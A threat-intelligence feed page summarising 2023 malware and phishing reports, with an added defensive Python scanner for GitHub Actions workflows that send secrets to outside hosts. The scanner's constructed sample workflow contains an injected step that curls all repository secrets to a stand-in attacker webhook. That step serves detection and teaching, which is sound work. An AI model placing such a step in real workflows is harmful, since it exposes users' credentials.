Cyble researchers uncovered a WinRAR CVE-2023-38831 abuse campaign delivering Apanyan Stealer, Murk-Stealer, and AsyncRAT to illicit-content consumers. The campaign starts with a deceptive RAR archive that triggers CMD/PowerShell-driven payloads and ends with …
Category: Threat Research
eSentire’s TRU team uncovered a multi-stage AsyncRAT deployment delivered via HTML smuggling, culminating in process hollowing and injector use to run AsyncRAT inside legitimate Windows processes. The operation starts with a phishing email, HTML/JavaScript loa…
eSentire reports a rise in Adversary-in-the-Middle (AitM) phishing campaigns starting mid-September 2023, where attackers lure users via malicious links or QR codes to capture credentials and session tokens for MFA bypass and BEC. Early detection of anomalous …
NSFOCUS documents three new Mirai-based botnets—hailBot, kiraiBot, and catDDoS—highlighting their spread, distinct capabilities, and techniques to evade detection. The report details propagation methods (vulnerability exploits and weak passwords), persistence …
LostTrust is a new multi-extortion ransomware that evolved from SFile and Mindware, sharing tradecraft with MetaEncryptor and producing similar artifacts and leak-site behavior. It encrypts files with a distinctive .losttrustencoded extension, attempts to disr…
Dark Pink APT Group (Saaiwc) is a Southeast Asia–focused cyber-espionage actor noted for stealthy campaigns, custom malware, and targeted operations across government, military, and educational sectors. The group relies on spear-phishing, bespoke tools like Te…
Dark River used spearphishing DOCX files exploiting CVE-2021-40444 to drop a modular DLL backdoor (MataDoor) that persists as a Windows service via a signed loader and is protected with Themida. The backdoor features AES-CFB encrypted configuration, reflective plug…
FortiGuard Labs discovered a targeted spearphishing campaign exploiting Azerbaijan–Armenia tensions that uses HTML smuggling in an HTML memo to deliver a password-protected archive which contains a malicious .LNK that launches an MSI via msiexec. The MSI insta…
In this report, we share our latest crimeware findings: the ASMCrypt cryptor/loader related to DoubleFinger, a new Lumma stealer and a new version of Zanubis Android banking trojan.
Talos reports that Qakbot-affiliated actors have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails since early August 2023, continuing despite the FBI’s late August 2023 infrastructure seizure. The operation suggests the de…
EclecticIQ identifies a Chinese state-sponsored cyber-espionage campaign targeting East Asia’s semiconductor sector, using the HyperBro loader with DLL side-loading, a Cobra DocGuard-hosted downloader, and a Go-based backdoor named ChargeWeapon to exfiltrate data …
Cyble CRIL observed a phishing campaign targeting Russian users that mirrors banned apps (ExpressVPN, WeChat, Skype) to deliver a Remote Management System (RMS) payload. The RMS tool—a legitimate remote administration utility—has been linked to …
In July 2023 attackers used stolen GitHub personal access tokens to push malicious commits impersonating Dependabot, adding a workflow (hook.yml) that exfiltrated repository secrets to hxxps://send[.]wagateway.pro/webhook and appending obfuscated JavaScript th…
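The Dependabot-impersonation case above hinges on a single injected workflow step that reads repository secrets and posts them to an attacker-controlled URL. The following is an added illustrative check, not code from the reported campaign, from GitHub or from Dependabot: it splits a workflow file into steps without a YAML library and flags any step that references `${{ secrets.* }}` or `toJSON(secrets)` while also calling a host outside github.com. The workflow text, the step names and the webhook host `send.attacker.example` are constructed for the example and are not the campaign's real indicators.

```python
"""Heuristic scan of a GitHub Actions workflow for secret exfiltration.

Flags steps that reference repository secrets AND contact a URL whose host
is not GitHub. The sample workflow below is constructed for this example;
the webhook host is a placeholder, not a real indicator of compromise.
"""
import re
from dataclasses import dataclass
from typing import List

# ${{ secrets.NAME }} or ${{ toJSON(secrets) }} (the latter dumps every secret)
SECRET_REF = re.compile(
    r"\$\{\{\s*(secrets\.[A-Za-z0-9_]+|toJSON\(\s*secrets\s*\))\s*\}\}"
)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Hosts (and their subdomains) a workflow is normally expected to talk to.
TRUSTED_HOSTS = {"github.com", "githubusercontent.com"}


@dataclass
class Finding:
    step: str
    secrets: List[str]
    hosts: List[str]


def is_trusted(host: str) -> bool:
    """Exact match or subdomain of a trusted host; 'github.com.evil.example' is not."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def split_steps(workflow_text: str) -> List[str]:
    """Crude split on YAML list-item lines ('  - name: ...'); avoids a YAML dependency."""
    return re.split(r"\n(?=\s*-\s)", workflow_text)


def step_name(chunk: str) -> str:
    m = re.search(r"^\s*(?:-\s*)?name:\s*(.+)$", chunk, re.M)
    return m.group(1).strip() if m else "<unnamed>"


def scan_workflow(workflow_text: str) -> List[Finding]:
    """Return one Finding per step that both reads secrets and reaches a non-trusted host."""
    findings: List[Finding] = []
    for chunk in split_steps(workflow_text):
        secrets = SECRET_REF.findall(chunk)
        hosts = sorted({h for h in URL_HOST.findall(chunk) if not is_trusted(h)})
        if secrets and hosts:
            findings.append(Finding(step_name(chunk), secrets, hosts))
    return findings


# Constructed sample: a benign step that uses GITHUB_TOKEN against api.github.com,
# and an injected step that dumps all secrets to an external webhook.
SAMPLE_WORKFLOW = """name: hook
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Install deps
        run: npm ci
      - name: Comment on PR
        run: |
          curl -s -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/repos/o/r/issues/1/comments -d '{"body":"ok"}'
      - name: Collect
        env:
          ALL: ${{ toJSON(secrets) }}
        run: curl -s -X POST -d "$ALL" https://send.attacker.example/webhook
"""

if __name__ == "__main__":
    for f in scan_workflow(SAMPLE_WORKFLOW):
        print(f"SUSPICIOUS step {f.step!r}: secrets {f.secrets} sent to {f.hosts}")
```

The heuristic is deliberately simple: the step that comments on a pull request with `GITHUB_TOKEN` against `api.github.com` is not reported, while the injected step that serialises every secret with `toJSON(secrets)` and posts it to `send.attacker.example` is. In practice a secret sent to any third-party host (coverage or deployment services, for instance) will also fire and needs triage against the repository's known integrations.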
Menlo Labs uncovered a targeted phishing campaign using the EvilProxy kit to impersonate Microsoft via Indeed open redirects, enabling session cookie theft and MFA bypass. The operation targeted US executives across financial services, property management/real…
The CYFIRMA report examines The-Murk-Stealer, an open-source infostealer masquerading as an educational tool that can covertly harvest data from browsers, wallets, messaging apps, VPNs, and more, with anti-analysis features and data exfiltration to Discord, Te…